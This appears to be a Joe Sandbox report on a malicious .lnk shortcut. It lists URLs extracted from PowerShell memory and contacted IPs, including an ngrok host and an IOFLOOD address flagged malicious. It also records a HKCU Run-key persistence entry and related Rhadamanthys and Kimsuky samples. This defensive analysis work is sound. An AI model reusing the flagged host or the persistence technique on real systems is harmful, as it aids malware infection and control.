                                                                                                                                                                                  https://paper.dropbox.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.hellofax.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://pal-test.adyen.compowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://23glcrtmzxqgwfpq3oujitt.ngrok.pizzapowershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111FCB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://permanently-removed.invalid/o/oauth2/revokemsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.hellosign.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://instructorledlearning.dropboxbusiness.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://permanently-removed.invalid/OAuthLogin(msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://www.dropbox.com/page_success/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://go.microspowershell.exe, 00000003.00000002.2355291636.000001DA98715000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.dropbox.com/pithos/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://sales.dropboxbusiness.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://piriform.com/go/app_cc_privacy_policy678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.00000000045F1000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000000.2494954160.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000000.2655015622.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://msn.com/msedge.exe, 00000006.00000002.2329082219.0000288402594000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://photos.dropbox.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://a.sprig.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://navi.dropbox.jp/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://contoso.com/powershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://www.dropbox.com/static/api/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          162.125.65.15
                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                                          162.125.69.18
                                                                                                                                                                                                                          		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                                          162.125.69.15
                                                                                                                                                                                                                          		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                                          142.250.181.65
                                                                                                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                          104.161.43.18
                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                          		53755IOFLOODUStrue
                                                                                                                                                                                                                          172.64.41.3
                                                                                                                                                                                                                          		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          3.124.142.205
                                                                                                                                                                                                                          		23glcrtmzxqgwfpq3oujitt.ngrok.pizzaUnited States
                                                                                                                                                                                                                          		16509AMAZON-02UStrue
                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                                          		unknownunknownfalse

                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          192.168.2.5
                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1578254
                                                                                                                                                                                                                          Start date and time:2024-12-19 13:43:06 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 10m 32s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:35
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:xWpAZpLw47.lnk
                                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                                          Original Sample Name:097c3f660c7d255147e359239dafdbd5f24f25a1a9450863160fc049256c1908.lnk
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.evad.winLNK@82/283@21/10
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 16.7%
                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .lnk

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 13.107.42.16, 13.107.21.239, 204.79.197.239, 172.217.17.78, 13.107.6.158, 23.32.239.56, 23.32.239.18, 2.16.158.50, 2.16.158.58, 2.16.158.51, 2.16.158.40, 2.16.158.43, 2.16.158.57, 2.16.158.56, 2.16.158.72, 2.16.158.73, 23.218.208.109, 172.165.69.228, 2.19.198.26, 2.19.198.8, 13.89.179.12, 142.250.65.227, 142.251.41.3, 142.251.32.99, 142.250.64.67, 142.250.176.195, 142.251.40.195, 13.107.246.63, 172.202.163.200, 94.245.104.56, 40.126.53.19, 13.107.246.40, 4.150.155.223, 172.183.192.109, 23.57.90.139, 23.198.214.137
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, mira.config.skype.com, config.edge.skype.com
                                                                                                                                                                                                                          • Execution Graph export aborted for target 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, PID 1628 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, PID 8992 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 8596 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 1440 because it is empty
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 9048 because it is empty
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          07:44:05API Interceptor237x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                          07:44:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                          07:45:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                          13:45:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nuinsa C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe
                                                                                                                                                                                                                          13:45:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nuinsa C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          162.125.65.15IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                            KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                              cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                  l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                    qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                      pay.batGet hashmaliciousKimsukyBrowse
                                                                                                                                                                                                                                        protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          https://www.dropbox.com/l/AADw7QsXXUEgtGMTkaD6s_noiLvCBcZslDg/downloadingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            35N4PXWcmC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              162.125.69.18RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                  sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                    jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                      Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                        https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                            122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse

                                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  chrome.cloudflare-dns.comFile di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
